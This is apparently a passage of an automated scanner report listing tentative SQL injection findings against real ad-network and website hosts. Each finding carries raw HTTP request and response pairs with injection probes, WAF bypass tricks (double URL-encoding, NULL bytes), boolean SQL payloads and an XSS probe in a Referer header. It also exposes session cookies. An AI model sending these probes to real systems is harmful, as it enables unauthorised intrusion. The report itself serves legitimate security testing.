GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37394

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
7878586;";
this.swfParams = 'aid=232434380&cid=39972439&pid=55865628&src=1361549&rv=3&rid=39990226&modelYear=&oem=&offerType=&modelName=&modelYear=2011&oem=nissan&offerType=positivemathstack&modelName=rogue';
this.renderingId = "39990226";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsM
...[SNIP]...

Request 2

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33336

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/cm.quadbostonherald/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/cm.quadbostonherald/?1%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Aug 27 15:34:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/cm.quadbostonherald/?1%2527%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 882
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('');

var fd_clk = 'http://adsfac.us/link.asp?cc=QAN007.310009.0&clk=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234940335%3B0-0%3B0%3B27622757%3B255-0/0%3B40265255/402830
...[SNIP]...

1.5. http://ads2.adbrite.com/v0/ad [zs parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1198099&zs=3732385f3930%00'&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html;charset=utf-8
Content-Length: 1000
Date: Sat, 29 Jan 2011 01:56:24 GMT
Connection: close

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /v0/ad?sid=1198099&zs=3732385f3930%00''&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: b=%3A%3Apogj; Domain=.adbrite.com; Expires=Sun, 29-Jan-2012 01:56:25 GMT; Path=/
Set-Cookie: geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; Domain=.adbrite.com; Expires=Sat, 05-Feb-2011 01:56:25 GMT; Path=/
Set-Cookie: vsd="0@1@4d4373c9@d3.zedo.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:25 GMT
Connection: close
Content-Length: 376

document.writeln("<script language=\"JavaScript\">");
document.writeln("var zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zflag_sz=
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/st.php%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php%2527%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 218
Keep-Alive: timeout=120, max=893
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php%27%27 was not found on this server.</
...[SNIP]...

1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adscgen/st.php/1%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php/1%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 214
Keep-Alive: timeout=120, max=888
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php/1 was not found on this server.</p>
<
...[SNIP]...

1.8. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static'%20and%201%3d1--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=1-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static'%20and%201%3d2--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=2-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

1.9. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 32712709'%20or%201%3d1--%20 and 32712709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html32712709'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html32712709'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.10. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 8336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
